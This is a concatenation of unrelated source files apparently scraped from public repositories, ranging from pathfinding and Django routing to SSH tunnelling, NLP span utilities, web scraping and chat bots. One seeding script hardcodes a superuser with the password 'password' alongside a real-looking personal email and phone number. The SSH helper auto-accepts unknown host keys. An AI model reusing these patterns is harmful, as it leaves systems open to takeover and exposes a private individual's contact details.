\"device_info\": async_redact_data(dict(router.device_info), {\"identifiers\"}),\n \"entities\": {},\n \"tracked_devices\": [],\n }\n\n hass_entities = er.async_entries_for_device(\n entity_registry,\n device_id=hass_device.id,\n include_disabled_entities=True,\n )\n\n for entity_entry in hass_entities:\n state = hass.states.get(entity_entry.entity_id)\n state_dict = None\n if state:\n state_dict = dict(state.as_dict())\n # The entity_id is already provided at root level.\n state_dict.pop(\"entity_id\", None)\n # The context doesn't provide useful information in this case.\n state_dict.pop(\"context\", None)\n\n data[\"device\"][\"entities\"][entity_entry.entity_id] = {\n \"name\": entity_entry.name,\n \"original_name\": entity_entry.original_name,\n \"disabled\": entity_entry.disabled,\n \"disabled_by\": entity_entry.disabled_by,\n \"entity_category\": entity_entry.entity_category,\n \"device_class\": entity_entry.device_class,\n \"original_device_class\": entity_entry.original_device_class,\n \"icon\": entity_entry.icon,\n \"original_icon\": entity_entry.original_icon,\n \"unit_of_measurement\": entity_entry.unit_of_measurement,\n \"state\": state_dict,\n }\n\n for device in router.devices.values():\n data[\"device\"][\"tracked_devices\"].append(\n {\n \"name\": device.name or \"Unknown device\",\n \"ip_address\": device.ip_address,\n \"last_activity\": device.last_activity,\n }\n )\n\n return data\n","sub_path":"homeassistant/components/asuswrt/diagnostics.py","file_name":"diagnostics.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"489571429","text":"#1963. Minimum Number of Swaps to Make the String Balanced\n#You are given a 0-indexed string s of even length n. The string consists of exactly n / 2 opening brackets '[' and n / 2 closing brackets ']'.\n\n#A string is called balanced if and only if:\n\n#It is the empty string, or\n#It can be written as AB, where both A and B are balanced strings, or\n#It can be written as [C], where C is a balanced string.\n#You may swap the brackets at any two indices any number of times.\n\n#Return the minimum number of swaps to make s balanced.\n\n \n\n#Example 1:\n\n#Input: s = \"][][\"\n#Output: 1\n#Explanation: You can make the string balanced by swapping index 0 with index 3.\n#The resulting string is \"[[]]\".\n\nclass Solution:\n def minSwaps(self, s: str) -> int:\n \n cnt_open = 0\n \n for c in s:\n if c == '[':\n cnt_open += 1\n elif cnt_open > 0:\n cnt_open -= 1\n \n return (cnt_open + 1)//2\n \n ","sub_path":"1963. Minimum Number of Swaps to Make the String Balanced.py","file_name":"1963. Minimum Number of Swaps to Make the String Balanced.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"559647087","text":"import heapq\nimport math\n\nMAZE0=\"\"\"\nS...\n.#..\n.##.\n.#G.\n\"\"\"\n\n\nMAZE1=\"\"\"\n.....................##.......\n.S...................##.......\n.....................##.......\n...##................##.......\n...##........##......##.......\n...##........##......#####....\n...##........##......#####....\n...##........##...............\n...##........##...............\n...##........##...............\n...##........##...............\n...##........##...............\n.............##...............\n.............##..........G....\n.............##...............\"\"\"\n\niterations=0\n\nclass Maze:\n\n def __init__(self, maze):\n self.maze = maze.strip()\n self.size = (len(self.maze.split()[0]), len(self.maze.split()))\n self.maze = \"\".join(self.maze.split())\n self.start = (self.maze.find(\"S\") % self.size[0], self.maze.find(\"S\") // self.size[0])\n self.goal = (self.maze.find(\"G\") % self.size[0], self.maze.find(\"G\") // self.size[0])\n \n def isfree(self, x, y):\n if x < 0 or y < 0 or x >= self.size[0] or y >= self.size[1]:\n return False\n\n return self.maze[x + y * self.size[0]] != \"#\"\n\n def neighbours(self, node):\n \n x, y = node\n result = set()\n\n for dx in [-1,0,1]:\n for dy in [-1,0,1]:\n if self.isfree(x+dx, y+dy):\n result.add((x+dx, y+dy))\n result.discard((x,y))\n return result\n\n def weight(self, nodeA, nodeB):\n \"\"\" Constant weight all over the maze\n \"\"\"\n return 1\n\n def __iter__(self):\n \"\"\"Returns all the cells in the maze that are free\n \"\"\"\n for node in [(x,y) for x in range(self.size[0]) \n for y in range(self.size[1]) \n if self.isfree(x,y)]:\n yield node\n\n def __str__(self):\n \"\"\"Inserts a line break at the end of each maze row\n and returns the corresponding string.\n \"\"\"\n return \"\\n\".join([self.maze[i:i+self.size[0]] for i in range(0, len(self.maze), self.size[0])]) + \"\\n\"\n\n def printpath(self, path):\n \"\"\" Overlays 'o' on top of the maze, at the coordinates given in the\n path, and prints the result.\n \"\"\"\n printout = list(self.maze)\n for x,y in path:\n printout[x + y * self.size[0]] = 'o'\n\n print(\"\\n\".join([\"\".join(printout[i:i+self.size[0]]) for i in range(0, len(printout), self.size[0])]) + \"\\n\")\n\n\n\nclass PriorityQueue:\n \"\"\" Simple priority queue: get_cheapest always returns the node with the\n lowest 'priority' value.\n\n Implementation taken from https://www.redblobgames.com/pathfinding/a-star/implementation.html\n \"\"\"\n def __init__(self):\n self.elements = []\n \n def empty(self):\n return len(self.elements) == 0\n \n def put(self, item, priority):\n heapq.heappush(self.elements, (priority, item))\n \n def get_cheapest(self):\n return heapq.heappop(self.elements)[1]\n\n\ndef dijkstra(graph):\n global iterations\n\n cost_to = {} # maps nodes to cost to 'start'\n come_from = {} # needed to reconstruct shortest path\n\n for node in graph:\n cost_to[node] = math.inf # initial cost from 'start' to 'node'. Requires Python >=3.5!\n\n cost_to[graph.start] = 0\n\n frontier = PriorityQueue()\n frontier.put(graph.start, 0)\n\n while not frontier.empty():\n u = frontier.get_cheapest() # remove best node\n\n if u == graph.goal:\n break\n\n for v in graph.neighbours(u): # iterate over nodes connected to u\n if cost_to[u] + graph.weight(u, v) < cost_to[v]: # new shorter path to v!\n cost_to[v] = cost_to[u] + graph.weight(u, v)\n frontier.put(v, cost_to[v])\n come_from[v] = u\n iterations+=1\n\n #path = getpath(v, come_from)\n #maze.printpath(path)\n #input()\n\n\n return cost_to, come_from\n\ndef getpath(goal, come_from):\n path = []\n node = goal\n while node in come_from:\n path = [node] + path # append at the front of our path\n node = come_from[node]\n\n return path\n\n\nif __name__==\"__main__\":\n\n maze = Maze(MAZE1)\n \n print(maze)\n input()\n\n cost_to, come_from = dijkstra(maze)\n path = getpath(maze.goal, come_from)\n\n maze.printpath(path)\n\n print(\"%d iterations\" % iterations)\n","sub_path":"demos/pathfinding/pathfinding.py","file_name":"pathfinding.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"464708173","text":"\"\"\"askmeout URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom app import views\nfrom django.conf.urls import url\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # url(r'^admin/', admin.site.urls),\n url(r'^login/$', views.login_blog),\n url(r'^register/$', views.register),\n url(r'^logout/$', views.logout_blog),\n url(r'^ask/', views.ask),\n url(r'^forum/', views.forum),\n url(r'^jargon/', views.jargon),\n url(r'^define/', views.define),\n url(r'^youtube/', views.youtube),\n url(r'^courses/', views.courses),\n url(r'^coursera', views.coursera),\n url(r'^search', views.search),\n url(r'^searcDef' , views.searchDef),\n url(r'^posts/$', views.posts),\n url(r'^new_post/$', views.new_post),\n ####################################\n url(r'^sendAns/(\\d+)$', views.sendAns),\n url(r'^sentQues/$', views.sentQues),\n url(r'^questionDetail/(\\d+)$', views.questionDetail),\n]\n","sub_path":"askmeout/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"57568050","text":"import logging\nimport socket\nimport threading\n\nimport paramiko\n\nfrom xdcs.app import xdcs\nfrom xdcs.utils.sockutils import couple_socks\n\nlogger = logging.getLogger(__name__)\n\n\nclass _ReverseForwardContext:\n def __init__(self,\n local_port: int,\n server_addr: str,\n server_port: int,\n asynchronous: bool) -> None:\n self.asynchronous = asynchronous\n self.local_port = local_port\n self.server_addr = server_addr\n self.server_port = server_port\n self.thread = None\n\n def __enter__(self):\n logger.debug(\"Connecting to \" + self.server_addr + \":\" + str(self.server_port))\n\n server_auth_name = xdcs().config('server.auth.name')\n server_auth_key = xdcs().config('server.auth.key', None)\n server_auth_password = xdcs().config('server.auth.password', None)\n\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(\n self.server_addr, self.server_port,\n username=server_auth_name,\n pkey=paramiko.RSAKey.from_private_key_file(server_auth_key),\n password=server_auth_password,\n look_for_keys=False,\n )\n logger.debug(\"Connected to server's sshd\")\n\n self.transport = client.get_transport()\n remote_port = self.transport.request_port_forward(\"127.0.0.1\", 0)\n logger.debug(\"Now forwarding remote port %d to local port %d\", remote_port, self.local_port)\n\n if self.asynchronous:\n self.thread = threading.Thread(target=self._transport_thread, args=())\n self.thread.setDaemon(True)\n self.thread.start()\n else:\n self._transport_thread()\n\n def _transport_thread(self):\n channel = None\n while channel is None:\n channel = self.transport.accept(1000)\n\n self._handle_opened_channel(channel)\n\n def _handle_opened_channel(self, channel):\n sock = socket.socket()\n try:\n sock.connect(('127.0.0.1', self.local_port))\n except Exception as e:\n logger.error(\"Forwarding request to local port %d failed: %r\", self.local_port, e)\n return\n\n logger.debug(\"Tunnel opened %r -> %r -> %r\", channel.origin_addr, channel.getpeername(),\n ('127.0.0.1', self.local_port))\n couple_socks(sock, channel)\n logger.debug(\"Tunnel closed from %r\", channel.origin_addr)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.transport.close()\n\n\ndef rforward(\n local_port: int,\n server_addr: str,\n server_port: int,\n asynchronous: bool = True) -> _ReverseForwardContext:\n return _ReverseForwardContext(local_port, server_addr, server_port, asynchronous)\n","sub_path":"xdcs-agent/src/main/python/xdcs/utils/rforward.py","file_name":"rforward.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"485221632","text":"def create_countries():\n from ujumbe.apps.weather.models import Country\n import pycountry\n for _ in pycountry.countries:\n Country.objects.get_or_create(\n alpha2=_.alpha_2,\n alpha3=_.alpha_3,\n name=_.name\n )\n return Country.objects.all()\n\n\ndef create_kenyan_counties():\n from ujumbe.apps.weather.models import Country, Location\n kenya, _ = Country.objects.get_or_create(name=\"Kenya\", alpha2=\"KE\", alpha3=\"KEN\")\n kenyan_counties = [\n \"Baringo\",\n \"Bomet\",\n \"Bungoma\"\n \"Busia\",\n \"Elgeyo Marakwet\",\n \"Embu\",\n \"Garissa\",\n \"Homa Bay\",\n \"Isiolo\",\n \"Kajiado\",\n \"Kakamega\",\n \"Kericho\",\n \"Kiambu\",\n \"Kilifi\",\n \"Kirinyaga\",\n \"Kisii\",\n \"Kisumu\",\n \"Kitui\",\n \"Kwale\",\n \"Laikipia\",\n \"Lamu\",\n \"Machakos\",\n \"Makueni\",\n \"Mandera\",\n \"Meru\",\n \"Migori\",\n \"Marsabit\",\n \"Mombasa\",\n \"Muranga\",\n \"Nairobi\",\n \"Nakuru\",\n \"Nandi\",\n \"Narok\",\n \"Nyamira\",\n \"Nyandarua\",\n \"Nyeri\",\n \"Samburu\",\n \"Siaya\",\n \"Taita Taveta\",\n \"Tana River\",\n \"Tharaka Nithi\",\n \"Trans Nzoia\",\n \"Turkana\",\n \"Uasin Gishu\",\n \"Vihiga \",\n \"Wajir\",\n \"West Pokot\",\n ]\n for county in kenyan_counties:\n Location.objects.get_or_create(\n name=county,\n country=kenya\n )\n return Location.objects.all()\n\n\ndef create_super_user_with_profile(username: str, password: str, email: str, first_name: str, last_name: str,\n telephone: str):\n from ujumbe.apps.profiles.models import Profile\n\n from django.contrib.auth.models import User # TODO :Change this to get_user_model\n\n superuser, created = User.objects.get_or_create(\n first_name=first_name,\n last_name=last_name,\n is_staff=True,\n is_superuser=True,\n is_active=True,\n username=username,\n )\n superuser.set_password(password)\n superuser.save()\n profile, created = Profile.objects.get_or_create(\n user=superuser,\n telephone=telephone\n )\n return profile\n\n\ndef create_celery_beat_tasks():\n from django_celery_beat.models import PeriodicTask, IntervalSchedule\n # executes every 10 seconds.\n schedule, created = IntervalSchedule.objects.get_or_create(\n every=10,\n period=IntervalSchedule.SECONDS\n )\n PeriodicTask.objects.get_or_create(\n interval=schedule,\n name=\"Check and send subscriptions\",\n task=\"ujumbe.apps.profiles.tasks.check_and_send_user_subscriptions\"\n )\n PeriodicTask.objects.get_or_create(\n interval=schedule,\n name=\"Check and process messages\",\n task=\"ujumbe.apps.africastalking.tasks.process_incoming_messages\"\n )\n\n\ndef run():\n create_countries()\n # create_kenyan_counties()\n create_super_user_with_profile(username=\"admin\", password=\"password\", email=\"jerryshikanga@gmail.com\",\n first_name=\"Jerry\", last_name=\"Shikanga\", telephone=\"+254727447101\")\n create_celery_beat_tasks()\n","sub_path":"scripts/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"496294131","text":"from django.db import models\nfrom django.utils import timezone\nfrom pygments.lexers import get_all_lexers\nfrom pygments.styles import get_all_styles\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters.html import HtmlFormatter\n\nLEXERS = [item for item in get_all_lexers() if item[1]]\nLANGUAGE_CHOICES = sorted([(item[1][0], item[0]) for item in LEXERS])\nSTYLE_CHOICES = sorted((item, item) for item in get_all_styles())\n\nclass Post(models.Model):\n author = models.ForeignKey('auth.User')\n title = models.CharField(max_length=200)\n text = models.TextField(default ='', blank=True)\n created_date = models.DateTimeField(\n default=timezone.now)\n published_date = models.DateTimeField(\n blank=True, null=True)\n #added after REST API implementation\n created = models.DateTimeField(auto_now_add=True)\n title = models.CharField(max_length=100)\n code = models.TextField(blank=True)\n linenos = models.BooleanField(default=False)\n language = models.CharField(choices=LANGUAGE_CHOICES, default='python', max_length=100)\n style = models.CharField(choices=STYLE_CHOICES, default='friendly', max_length=100)\n owner = models.ForeignKey('auth.User', related_name='items', on_delete=models.CASCADE, null=True, blank=True)\n\n\n def publish(self):\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.title\n","sub_path":"todoapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"418713365","text":"from dataset import *\nfrom model import *\nfrom loss import *\nimport cv2 \n\ntrain_dataset = tf.data.Dataset.list_files(PATH + 'train/*.jpg', shuffle=cfg.BUFFER_SIZE)\ntrain_dataset = train_dataset.map(lambda x:load_image(x, True))\ntrain_dataset = train_dataset.batch(1)\n\ntest_dataset = tf.data.Dataset.list_files(PATH + 'test/*.jpg')\ntest_dataset = test_dataset.map(lambda x:load_image(x, False))\ntest_dataset = test_dataset.batch(1)\n\ngenerator = Generator()\ndiscriminator = Discriminator()\n\ngenerator_optimizer = tf.train.AdamOptimizer(2e-4, beta1=0.5)\ndiscriminator_optimizer = tf.train.AdamOptimizer(2e-4, beta1=0.5)\n\ncheckpoint_dir = './training_checkpoints'\ncheckpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\ncheckpoint = tf.train.Checkpoint(generator_optimizer=generator_optimizer, discriminator_optimizer=discriminator_optimizer)\n\nEPOCHS = cfg.EPOCHS\n\ndef save_images(model, test_input, tar, epoch):\n\tprediction = model(test_input, training=True)\n\ttest_input, target, predicted_output = test_input[0], tar[0], prediction[0]\n\timg = np.hstack([test_input, target, predicted_output])\n\n\tif not os.path.exists('samples/'):\n\t\tos.makedirs('samples/')\n\n\tcv2.imwrite(\"epoch-{}.jpg\".format(img))\n\n\ndef train(dataset, epochs):\n\n\tfor epoch in range(epochs):\n\t\tstart = time.time()\n\n\t\tfor input_image, target in dataset:\n\t\t\twith tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n\t\t\t\tgen_output = generator(input_image, training=True)\n\t\t\t\tdisc_real_output = discriminator(input_image, target, training=True)\n\t\t\t\tdisc_generated_output = discriminator(input_image, gen_output, training=True)\n\n\t\t\t\tgen_loss = generator_loss(disc_generated_output, gen_output, target)\n\t\t\t\tdisc_loss = discriminator_loss(disc_real_output, disc_generated_output)\n\n\t\t\t\tgenerator_gradients = gen_tape.gradient(gen_loss, generator.variables)\n\t\t\t\tdiscrimiator_gradients = disc_tape.gradient(disc_loss, discriminator.variables)\n\n\t\t\t\tgenerator_optimizer.apply_gradients(zip(generator_gradients, generator.variables))\n\t\t\t\tdiscriminator_optimizer.apply_gradients(zip(discrimiator_gradients, discriminator.variables))\n\n\t\tif(epoch%1 == 0):\n\t\t\tfor inp, tar in test_dataset.take(1):\n\t\t\t\tsave_images(generator, inp, tar, epoch)\n\n\t\tif( (epoch + 1)%20 == 0):\n\t\t\tcheckpoint.save(file_prefix=checkpoint_prefix)\n\n\t\tprint(\"Time taken for epoch {} is {} seconds\".format((epoch + 1), (time.time() - start)))\n\ntrain(train_dataset, EPOCHS)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"436942535","text":"import heapq\n\n\nanswer = 0\nscoville = [1,2,3,9,10,12]\nK = 7\nkey = 0\nheapq.heapify(scoville)\nwhile len(scoville)>=1:\n check1 = heapq.heappop(scoville)\n if check1>K:\n #return -1\n key = 1\n break\n if len(scoville)>=1:\n check2 = heapq.heappop(scoville)\n scocheck = check1 + check2 * 2\n heapq.heappush(scoville, scocheck)\n answer += 1\n\n\nif not key:\n answer = -1\n\nprint(answer)\n","sub_path":"hot.py","file_name":"hot.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"279812314","text":"from IPython.core.display import display, HTML\nfrom http.client import InvalidURL\nimport matplotlib\nimport matplotlib.cm\nimport unicodedata\n\nfrom collections import defaultdict\n\n\nPUNCT = '.,?!();:'\n\n\ndef display_spans(spans, text):\n # todo: use style=\"background-color: #Oxffffff\"\n result = []\n spans = set(spans)\n toxic, prev_toxic = False, False\n for i, c in enumerate(text):\n if i in spans:\n toxic = True\n if not prev_toxic:\n result.append('')\n else:\n toxic = False\n if prev_toxic:\n result.append('')\n result.append(c)\n prev_toxic = toxic\n try:\n display(HTML(''.join(result)))\n except InvalidURL:\n print(''.join(result))\n\n \ndef display_token_scores(tokens, scores, b=None, cmap=None, bert=False):\n if cmap is None:\n cmap = matplotlib.cm.get_cmap('bwr')\n if b is None:\n b = [0] * len(tokens)\n\n spans = []\n for token, score, boldness in zip(tokens, scores, b):\n text = token.replace(\"Ġ\", \" \")\n if bert:\n if text.startswith('##'):\n text = text[2:]\n elif text not in PUNCT or text == '(':\n text = ' ' + text\n if boldness:\n text = '{}'.format(text)\n spans.append(\n '{}'.format(\n \"#{0:02x}{1:02x}{2:02x}\".format(*cmap(score, bytes=True)[:3]),\n text\n )\n )\n display(HTML(''.join(spans)))\n\n \ndef spans2labels(text, spans, tokenizer, bos=True, left_space=False):\n token_ids = tokenizer.encode(text)\n tokens = tokenizer.convert_ids_to_tokens(token_ids)\n char2tok = [0] * len(text)\n left = 0\n first = 1 if bos else 0\n for i, tok in enumerate(tokens[first:-1]):\n right = left + len(tok)\n if i == 0 and left_space:\n right -= 1\n char2tok[left:right] = [i+bos] * (right - left)\n left = right\n labels = [0] * len(tokens)\n for toxic_char in spans:\n labels[char2tok[toxic_char]] = 1\n return labels\n\n\ndef labels2spans(text, labels, tokenizer, space = 'Ġ', bos=True, left_space=False):\n result = []\n token_ids = tokenizer.encode(text)\n tokens = tokenizer.convert_ids_to_tokens(token_ids)\n left = 0\n prev_label = 0\n first = 1 if bos else 0\n for i, (tok, label) in enumerate(zip(tokens[first:-1], labels[first:-1])):\n right = left + len(tok)\n if i == 0 and left_space:\n right -= 1\n if label:\n if tok[0] == space and not prev_label:\n left += 1\n result.extend(range(left, right))\n left = right\n prev_label = label\n return result\n\n\ndef decode_spans(text, target_proba, threshold, tokenizer, agg=max, space='Ġ', punct=PUNCT, return_spans=True, truncate=True):\n # try to label a whole multitoken word consistently\n punct = set(punct)\n result = []\n token_labels = [0]\n token_ids = tokenizer.encode(text)\n if truncate:\n token_ids = token_ids[:tokenizer.model_max_length]\n tokens = tokenizer.convert_ids_to_tokens(token_ids)\n assert len(tokens) <= len(target_proba), '{} > {}'.format(len(tokens), len(target_proba))\n left = 0\n prev_label = 0\n word_start = 0\n word_scores = []\n for i, (tok, tp) in enumerate(zip(tokens[1:], target_proba[1:])):\n right = left + len(tok)\n # start of word (except the first one)\n if i > 0 and (tok[0] == space or tok == '' or tok in punct):\n word_score = agg(word_scores)\n if word_score > threshold:\n if not prev_label and i > 0:\n word_start += 1\n prev_label = 1\n result.extend(range(word_start, left))\n token_labels.extend([1] * len(word_scores))\n else:\n prev_label = 0\n token_labels.extend([0] * len(word_scores))\n word_scores = []\n word_start = left\n word_scores.append(tp)\n left = right\n token_labels.extend([0] * len(word_scores))\n if return_spans:\n return result\n else:\n return token_labels\n\n\ndef bertlike_normalize(text):\n \"\"\"Strips accents from a piece of text.\"\"\"\n text = unicodedata.normalize(\"NFD\", text.lower())\n output = []\n for char in text:\n cat = unicodedata.category(char)\n if cat == \"Mn\":\n continue\n output.append(char)\n return \"\".join(output)\n\n\ndef bert_char2tok(text, tokens, bos=1):\n # find approximate positions of each sentencepiece token in a text\n # spaces are all mapped to zero token\n char2tok = [0] * len(text)\n tnorm = bertlike_normalize(text)\n\n left = 0\n first = int(bos)\n for i, tok in enumerate(tokens[first:-1]):\n t2 = tok.lstrip('##')\n position = tnorm.find(t2, left)\n if position == -1:\n print(t2, 'not found in', tnorm[left:])\n continue\n left = position\n right = left + len(t2)\n if i == 0:\n right -= 1\n char2tok[left:right] = [i+bos] * (right - left)\n left = right\n return char2tok\n\ndef bert_spans2labels(text, spans, tokenizer):\n tokens = tokenizer.convert_ids_to_tokens(tokenizer.encode(text))\n labels = [0] * len(tokens)\n char2tok = bert_char2tok(text, tokens)\n for ch in spans:\n if ch >= len(char2tok):\n # this behavior may happen with weird tokens (e.g. accents), let's just ignore it\n break\n t = char2tok[ch]\n if t > 0:\n labels[t] = 1\n return labels\n\n\ndef bert_labels2spans(text, labels, tokenizer):\n result = []\n token_ids = tokenizer.encode(text)\n tokens = tokenizer.convert_ids_to_tokens(token_ids)\n c2t = bert_char2tok(text, tokens)\n t2c = defaultdict(list)\n for i, t in enumerate(c2t):\n if t > 0: t2c[t].append(i)\n \n left = 0\n prev_label = 0\n first = 1\n for i, (tok, label) in enumerate(zip(tokens[first:-1], labels[first:-1])):\n token_range = t2c[i+first]\n if not token_range:\n continue\n left, right = min(token_range), max(token_range)\n # print(i, tok, \"'\" + text[left:right] + \"'\")\n if label:\n result.extend(range(left - prev_label, right + 1))\n prev_label = label\n return result\n","sub_path":"semeval2021/spans_utils.py","file_name":"spans_utils.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"355028645","text":"import bs4 as bs\nimport urllib.request\n\n\n# getting the source code\nsauce = urllib.request.urlopen('https://www.booking.com/').read()\n\n\n# turn the source code into bsoup object\nsoup = bs.BeautifulSoup(sauce, 'lxml')\n\n\n# Booking´s promotions\ndef get_promotions():\n for div in soup.find_all('div', class_='promotion-postcards-list'):\n a = div.find_all('a')\n print(a)\n\n\nget_promotions()\n\n\n\n\n# Booking's accommodations on the home page\ndef get_accommodations():\n for div in soup.find_all('div', class_='d-bh-promotion--overflow '):\n a = div.find_all('a')\n print(a)\n\n\n#get_accommodations()\n\n# popular destinations\ndef get_popular_destinations():\n for ul in soup.find_all('ul', class_='b-popular_list lp_endorsements_popular_destinations_container'):\n li = ul.find_all('a')\n print(li)\n\n\n\n# get_popular_destinations()\n\n\n# Discover with booking\ndef discover_destinations():\n for p in soup.find_all('div', class_='dcbi-country__container'):\n a = p.find_all('p')\n print(a)\n\n\n# discover_destinations()\n\n","sub_path":"scrapping.py","file_name":"scrapping.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"361944243","text":"import os\nimport logging\nfrom sanic import Sanic\nfrom sanic.response import HTTPResponse\nimport sanic_sockjs\n\nCHAT_FILE = open(\n os.path.join(os.path.dirname(__file__), 'chat.html'), 'rb').read()\n\n\nasync def chat_msg_handler(msg, session):\n if msg.type == sanic_sockjs.MSG_OPEN:\n session.manager.broadcast(\"Someone joined.\")\n elif msg.type == sanic_sockjs.MSG_MESSAGE:\n session.manager.broadcast(msg.data)\n elif msg.type == sanic_sockjs.MSG_CLOSED:\n session.manager.broadcast(\"Someone left.\")\n\napp = Sanic(__name__)\n\n@app.get('/')\nasync def index(request):\n return HTTPResponse(None, body_bytes=CHAT_FILE, content_type=\"text/html\")\n\n\nif __name__ == '__main__':\n \"\"\"Simple sockjs chat.\"\"\"\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(message)s')\n\n sanic_sockjs.add_endpoint(app, chat_msg_handler, name='chat', prefix='/sockjs/')\n\n app.run(\"127.0.0.1\", 8002)\n","sub_path":"examples/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"159162480","text":"#! python3\n# bulletPointAdder.py - add bullet points to lines\n\nimport pyperclip\n\ntext = pyperclip.paste()\n\n# seperate lines\nlines = text.split('\\n')\n\n# add *(star) to each line\nfor i in range(len(lines)):\n\tlines[i] = '* ' + lines[i]\n\n# join lines\ntext = '\\n'.join(lines)\n\npyperclip.copy(text)\n","sub_path":"bulletPointAdder.py","file_name":"bulletPointAdder.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"370077249","text":"# -*- coding: gb2312 -*-\nfrom docx import Document\n# from docx.shared import Pt\n# from docx.oxml.ns import qn\n# from docx.shared import Inches\nimport os\n\n##目标目录\nbasep = '.\\\\'\ndirs = []\nfiles = []\n##可以指定targetpath 如果不写就在各个文件的根目录下生成docx\ntargetPath = '.\\\\result'\n# targetPath=''\n\nif targetPath == None:\n targetPath = ''\n\nif not os.path.exists(targetPath) and targetPath != '':\n os.mkdir(targetPath)\n\n#读取文件并生成docx\ndef handleFile(fplist):\n for fp in fplist:\n if os.path.exists(fp) and os.path.splitext(fp)[-1] == '.txt':\n lines = []\n f = open(fp)\n lines = f.readlines()\n f.close()\n document = Document()\n for line in lines:\n paragraph = document.add_paragraph(line)\n\n savepath = ''\n if targetPath != '':\n name = os.path.splitext(os.path.basename(fp))[0]\n savepath = os.path.join(targetPath, name+'.docx')\n document.save(savepath)\n\n else:\n name = os.path.splitext(fp)[0]\n savepath = name+'.docx'\n document.save(savepath)\n if savepath != '':\n print('file saved:', savepath)\n\n#遍历文件夹\ndef detectPath(path):\n for root, dirs, files in os.walk(path):\n print(root,dirs,files)\n fplist = [os.path.join(root, f) for f in files]\n handleFile(fplist)\n\n\n#执行方法\ndetectPath(basep)\n","sub_path":"background/05-docx/handle.py","file_name":"handle.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445537851","text":"import time\nimport json \nimport requests\nimport urllib\nimport numpy as np\nimport random\nfrom sys import stdout\nfrom keras.models import load_model\nimport utils\n\n\nTOKEN = open('../data/data_bot').read().strip(' \\n') \nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = get_json_from_url(url)\n return js\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return (text, chat_id)\n\n\ndef send_message(text, chat_id):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}\".format(text, chat_id)\n get_url(url)\n\ndef send_message_reply(text, chat_id, msg_id):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}&reply_to_message_id={}\".format(text, chat_id,msg_id)\n get_url(url) \n\ndef set_action(chat_id, action):\n url = URL + \"sendChatAction?chat_id={}&action={}\".format(chat_id, action)\n get_url(url)\n\n\ndef handle_updates(updates,predictor,voc):\n first = True\n for update in updates[\"result\"]:\n try:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n msg = update[\"message\"][\"message_id\"]\n if 'first_name' in update[\"message\"][\"from\"]:\n to = update[\"message\"][\"from\"][\"first_name\"]\n else:\n to = ''\n if 'username' in update[\"message\"][\"from\"]:\n user = 